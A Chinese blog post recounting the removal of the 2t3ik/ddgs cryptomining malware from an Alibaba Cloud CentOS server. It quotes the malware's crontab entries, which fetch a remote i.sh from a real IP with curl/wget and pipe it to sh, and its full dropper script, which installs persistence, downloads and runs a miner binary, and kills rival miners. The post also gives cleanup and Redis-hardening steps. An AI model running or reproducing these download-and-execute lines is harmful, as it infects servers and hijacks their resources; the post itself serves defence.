阿里云centos上处理2t3ik与ddgs病毒

阿里云centos上处理2t3ik与ddgs病毒

 

有段时间没有登陆阿里云了，前两天收到阿里云的短信，意思是:检测到我的linux服务器出现异常文件下载，请登陆控制台查看，我登陆控制台看到如下图显示

系统centos

由于我是新手，点了半天也没有免费的修复的按钮，而且升级企业版才可以查看，穷屌丝一个，升级企业版是不可能得到……

于是我就没有管它。

今天有时间登陆阿里云服务器看看什么情况，使用xshell连接，输入命令时候一卡一卡的，我还以为是xshell的问题呢，于是我还了putty登陆，还是一样，输入一个字母都卡半天，这就表明不是xshell的问题了，耐着性子输入top命令以查看，有个2t3ik.p的进程占用着99%多的CPU使用率，我赶紧把这个进程杀了，嗯，这下用着不卡了。

可是还没有等到半分钟，又开始一卡一卡的，继续使用top命令一看，还是这个2t3ik.p，只不过换了个PID

我也不知道这个进程是干什么的，可是不管这个是什么作用的进程让我的服务器卡顿我都要杀掉，于是我就百度搜索了这个进程，遗憾的是在百度上2t3ik.p这个关键字搜不到什么相关的信息

百度不行那我上阿里云官网看看有什么解决的办法，很遗憾，找不到，那我就谷歌吧，说起来还是谷歌好，虽然相关结果不多，也是让我找到线索处理这个2t3ik.p进程了，这个进程文件在/tmp目录下

于是把这个2t3ik.p文件删除，可是没过过一分钟又出现了这个文件，阿里云的管理台上提示出现异常文件文件下载

然后我吧这个文件删除掉，在新建一个2t3ik.p文件，不给权限，2t3ik.p进程是没有了，却又出现2t3ik.m这个进程

在/tmp文件夹下有2t3ik.m这个文件

想到过给/tmp文件夹添加不可修改的权限，觉得不大现实，因为以后这个文件夹会用到

那么把所有让所有以2t3ik开头的文件不给修改权限

使用命令

chattr +i 2t3ik*

chattr +i ddgs*

搞定，再也没有2t3ik的进程了

再也没有恼人的2t3ik病毒了

PS：阿里云的aliyundun真的不管用，对这个进程竟然防不了

PPS：阿里云对异常处理竟然还要升级企业版才能查看与一键处理，我一介屌丝哪来这个闲钱去升级啊

 

 

 

2t3ik与ddgs挖矿病毒处理

一、问题现象 

朋友的阿里云LINUX服务器， 发现有2t3ik与ddgs两个异常进程，把CPU几乎耗尽了。其描述kill掉以后，过一会儿又会重新出现。 

二、分析处理

即然kill 后过一会儿又会出现，那就有两种可能：1、crontab定时调用；2、有守护进程，个别病毒还会修改ps和top，通过这些命令无法查看到隐藏的守护进程。先看了下crontab，发现如下两条内容：

 

1. */5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh
2. */5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh

查询了下165.225.157.157这个IP来自美国拉斯维加斯。获取了下i.sh脚本，发现内容如下：

 

1. export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
2. echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/root
3. echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/root
4. mkdir -p /var/spool/cron/crontabs
5. echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/crontabs/root
6. echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
7. if [ ! -f "/tmp/ddgs.3011" ]; then
8. curl -fsSL http://165.225.157.157:8000/static/3011/ddgs.i686 -o /tmp/ddgs.3011
9. fi
10. chmod +x /tmp/ddgs.3011 && /tmp/ddgs.3011
11. ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
12. ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
13. ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
14. ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
15. ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
16. ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill

简单的一个shell 脚本，前面是创建crontab定时任务，后面下面了ddgs.i686程序并执行。可以确定就是这个来自美国的国际友人的程序干的坏事了。

删除crontab内容，并kill 掉相关进程后，观察一段时间发现其不再重新出现。问题解决。当然，为避免其后面再出现，可以做以下预防操作：

 

1. cd /tmp/
2. rm -rf 2t3ik.p
3. rm -rf ddgs.3011
4. touch 2t3ik.p
5. touch ddgs.3011
6. chattr +i 2t3ik*
7. chattr +i ddgs*

 

三、产生原因

网上也找了下该病毒的相关信息，了解到其一般是由于安装了redis后，未设置密码或密码太过简单，导致的被入侵。redis密码修改方法如下：

 

1. redis-cli -h 127.0.0.1 -p 6379
2. config get requirepass //获取当前密码
3. config set requirepass "yourpassword"//设置当前密码,服务重新启动后又会置为默认，即无密码；

永久生效方法为，打开redis配置文件redis.conf，找到requirepass值修改密码，如下：

1. requirepass yourpassword //此处注意，行前不能有空格

另外，平时还是建议安装chkrootkit、rkhunter、Lynis、ISPProtect这类安全工具，定期做扫描。